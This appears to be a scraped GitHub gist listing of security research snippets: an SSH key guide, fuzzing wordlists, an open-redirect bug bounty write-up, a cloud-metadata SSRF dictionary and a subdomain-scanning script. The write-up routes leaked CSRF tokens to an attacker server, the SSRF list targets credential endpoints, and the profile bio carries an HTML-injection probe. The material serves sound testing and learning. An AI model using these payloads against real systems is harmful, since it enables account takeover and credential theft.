Skip to content

Instantly share code, notes, and snippets.

View 0xbharath's full-sized avatar
:shipit:
Joy of programming! <img src=1>

Bharath 0xbharath

:shipit:
Joy of programming! <img src=1>
View GitHub Profile
@Kranzes
Kranzes / guide.md
Last active November 18, 2024 07:46
SSH Resident Key Guide

Initial checks

Start by checking that there aren't any previous ssh keys inside the FIDO2 authenticator of your YubiKey. You can check if they exist by running the command below:

nix shell nixpkgs#yubikey-manager -c ykman fido credentials list

If the command above outputs a string mentioning "ssh" or "openssh", then you have already got a key generated and store on your YubiKey.

Evaluating additional authentication factors

Before generating a new ssh key to store on your YubiKey you must consider which additional required authentication factors you want to use. Below you can see a table with the available factors and their corresponding command:

@yassineaboukir
yassineaboukir / List of API endpoints & objects
Last active November 17, 2024 16:48
A list of 3203 common API endpoints and objects designed for fuzzing.
0
00
01
02
03
1
1.0
10
100
1000

You do not need to run 80 reconnaissance tools to get access to user accounts

An open redirect was almost everything I needed in two different bug bounty programs to get access to user accounts. In one of the cases a JWT was leaked, and in the other the CSRF token was leaked. The issue was mostly the same in both cases: not validating, or URI encoding, user input in the client-side, and sending sensitive information to my server using an open redirect.

CSRF token bug

  1. There is an open redirect on https://example.com/redirect?url=https://myserver.com/attack.php
  2. User loads https://example.com/?code=VALUE
  3. Javascript code in https://example.com/ makes a GET request to https://example.com/verify/VALUE with a header x-csrf-token set to the CSRF token for the session of the user
    GET /verify/VALUE HTTP/1.1
    Host: example.com
    
@bvaughn
bvaughn / profiling-a-chrome-extension.md
Last active February 21, 2024 05:46
Profiling a custom Chrome extension

Chrome's profiler ("Performance tab) is very useful for measuring JavaScript performance, but what if you want to measure the performance of a custom extension?

For example, what if I would like to profile the following interaction:


The interaction we want to profile


@jhaddix
jhaddix / cloud_metadata.txt
Last active November 16, 2024 11:54 — forked from BuffaloWill/cloud_metadata.txt
Cloud Metadata Dictionary useful for SSRF Testing
## AWS
# from http://docs.aws.amazon.com/AWSEC2/latest/UserGuide/ec2-instance-metadata.html#instancedata-data-categories
http://169.254.169.254/latest/user-data
http://169.254.169.254/latest/user-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/iam/security-credentials/[ROLE NAME]
http://169.254.169.254/latest/meta-data/ami-id
http://169.254.169.254/latest/meta-data/reservation-id
http://169.254.169.254/latest/meta-data/hostname
http://169.254.169.254/latest/meta-data/public-keys/0/openssh-key
@dboyd13
dboyd13 / aws-certified-security-specialist-study-notes.txt
Last active September 15, 2023 03:38
aws-certified-security-specialist-study-notes
___ _____ ___ _ _ __ _ _ ___ _ _ ___ _ _ _
/_\ \ / / __| ___ / __|___ _ _| |_(_)/ _(_)___ __| | / __| ___ __ _ _ _ _(_) |_ _ _ / __|_ __ ___ __(_)__ _| | |_ _ _
/ _ \ \/\/ /\__ \ |___| | (__/ -_) '_| _| | _| / -_) _` | \__ \/ -_) _| || | '_| | _| || | \__ \ '_ \/ -_) _| / _` | | _| || |
/_/ \_\_/\_/ |___/ \___\___|_| \__|_|_| |_\___\__,_| |___/\___\__|\_,_|_| |_|\__|\_, | |___/ .__/\___\__|_\__,_|_|\__|\_, |
|__/ |_| |__/
Notes taken in Mar-2018, from acloud.guru and AWS FAQ
___ _ _ _ __ _
/ __| ___ __ _ _ _ _(_) |_ _ _ / |/ \/ |
@haccer
haccer / scanio.sh
Last active November 9, 2024 03:49
PoC script to mass-locate vulnerable subdomains using results from Rapid7's Project Sonar
#!/bin/bash
# Usage : ./scanio.sh <save file>
# Example: ./scanio.sh cname_list.txt
# Premium
function ech() {
spinner=( "|" "/" "-" "\\" )
while true; do
for i in ${spinner[@]}; do
echo -ne "\r[$i] $1"
@EdOverflow
EdOverflow / github_bugbountyhunting.md
Last active November 8, 2024 20:13
My tips for finding security issues in GitHub projects.

GitHub for Bug Bounty Hunters

GitHub repositories can disclose all sorts of potentially valuable information for bug bounty hunters. The targets do not always have to be open source for there to be issues. Organization members and their open source projects can sometimes accidentally expose information that could be used against the target company. in this article I will give you a brief overview that should help you get started targeting GitHub repositories for vulnerabilities and for general recon.

Mass Cloning

You can just do your research on github.com, but I would suggest cloning all the target's repositories so that you can run your tests locally. I would highly recommend @mazen160's GitHubCloner. Just run the script and you should be good to go.

$ python githubcloner.py --org organization -o /tmp/output
@Fitblip
Fitblip / slack_notification.py
Created June 24, 2017 06:17
An example for certstream to send a slack notification.
import certstream
import json
import requests
# Set the webhook_url to the one provided by Slack when you create the webhook at https://my.slack.com/services/new/incoming-webhook/
WEBHOOK_URL = os.environ["SLACK_WEBHOOK_URL"]
NEEDLE = "coinbase"
# Search for domains with a keyword in them and write the corresponding certificate to a file